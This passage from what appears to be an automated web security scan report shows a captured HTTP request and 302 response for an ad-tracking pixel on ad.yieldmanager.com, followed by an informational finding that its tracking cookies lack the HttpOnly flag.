GET /pixel?id=1274605&id=56918&id=315889&id=1009698&id=621393&id=665981&id=1268392&id=317325&id=1198035&id=1049794&id=1238051&id=481602&id=185980&id=770484&id=757774&id=74560&id=1086373&id=1196055&id=1086372&id=1264419&id=593881&id=1215295&id=1236954&id=1086371&id=1086370&id=1086369&id=926097&id=1236953&id=1196051&id=1236950&id=1236951&id=1147048&id=107089&id=1049851&id=1096152&id=1063912&id=1166710&id=1063916&id=1063911&id=1063910&id=1215322&id=1009546&id=715901&id=1023315&id=715883&id=725071&id=109108&id=75921&id=1081817&id=1006093&id=86237&id=1006089&id=1009578&id=1049785&id=1191521&id=1201817&id=1086731&id=641525&id=1049788&id=124865&id=1284585&id=1086733&id=1077940&id=1044410&id=1093100&id=613349&id=1010298&id=397181&id=1009462&id=397180&id=1044578&id=1010301&id=1041270&id=1020427&id=1093092&id=1093093&id=1049769&id=1049770&id=596293&id=576685&id=596292&id=1049772&id=1044587&id=596291&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!2<(!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:03:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%4!!*oY!!!!,=!=9l!!-?2!!!!2=!=9l!!-O3!!!!'=!=9l!!.tS!!!!-=!=9l!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!1jo!!!!#=!=9l!!2(j!!!!/<whqI!!2+Y!!!!#=!=9l!!2a*!!!!#=!4ti!!4<!!!!!#=!=9l!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!=d!!!!!#=!=9l!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!ONX!!!!#<wle$!!ObA!!!!-=!=9l!!Os7!!!!#=!=9l!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!Zwa!!!!#=!=9l!!Zwb!!!!+=!=9l!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!g[r!!!!#=!=9l!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!-=!=9l!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!-=!=9l!!wQ3!!!!-=!=9l!!wQ4!!!!#=!=9l!!wQ5!!!!-=!=9l!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!!ypo!!!!#=!=9l!##!O!!!!#=!=9l!#%hB!!!!#=!=9l!#'uj!!!!#<wsgD!#*2)!!!!#=!=9l!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*0!!!!#=!=9l!#1*C!!!!+=!=9l!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#6oy!!!!#=!=9l!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8ZP!!!!#=!=9l!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#M]c!!!!)<xt,H!#O29!!!!+=!=9l!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!+=!=9l!#Z8E!!!!#=!=9l!#ZPp!!!!#<y,`,!#Zb$!!!!#=!=9l!#Zc#!!!!#=!=9l!#ZcE!!!!#=!=9l!#Zdi!!!!#=!=9l!#Zkn!!!!#=!=9l!#Zkq!!!!#=!=9l!#]%`!!!!%=!$iT!#]7$!!!!#=!=9l!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!+=!=9l!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!+=!=9l!#`S2!!!!-=!=9l!#`U0!!!!,=!=9l!#`U9!!!!+=!=9l!#a4,!!!!#<y,`,!#a=6!!!!,=!=9l!#a=7!!!!,=!=9l!#a=9!!!!,=!=9l!#a=G!!!!#=!=9l!#a=J!!!!#=!=9l!#a=P!!!!,=!=9l!#a>3!!!!#=!=9l!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c8V!!!!+=!=9l!#c8W!!!!+=!=9l!#c8X!!!!+=!=9l!#c8]!!!!+=!=9l!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!%=!=9l!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#ec9!!!!#=!=9l!#fBj!!!!#=!=9l!#fBk!!!!#=!=9l!#fBl!!!!#=!=9l!#fBm!!!!#=!=9l!#fBn!!!!#=!=9l!#fG)!!!!+=!=9l!#fG+!!!!,=!=9l!#ffc!!!!#=!27c!#g<r!!!!#=!=9l!#g<s!!!!#=!=9l!#g=!!!!!+=!=9l!#g]5!!!!)<xdAS!#gar!!!!#=!=9l!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#n`.!!!!#=!27c!#ne_!!!!+=!=9l!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#qM!!!!!#=!=9l!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#trq!!!!#=!=9l!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!+=!=9l!#uR7!!!!#=!=9l!#ujQ!!!!+=!=9l!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vA$!!!!#=!=9l!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#x4V!!!!#=!=9l!#x4r!!!!#=!=9l!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#4B!!!!#=!=9l!$#4C!!!!#=!=9l!$#4E!!!!#=!=9l!$#4F!!!!#=!=9l!$#B>!!!!*=!=9l!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!-=!=9l!$(Gt!!!!/=!2<(!$(S9!!!!+=!=9l!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!-=!=9l!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!+=!=9l!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; path=/; expires=Sat, 11-May-2013 11:03:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457" height="1" width="1"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 11:03:11 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

14.53. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#w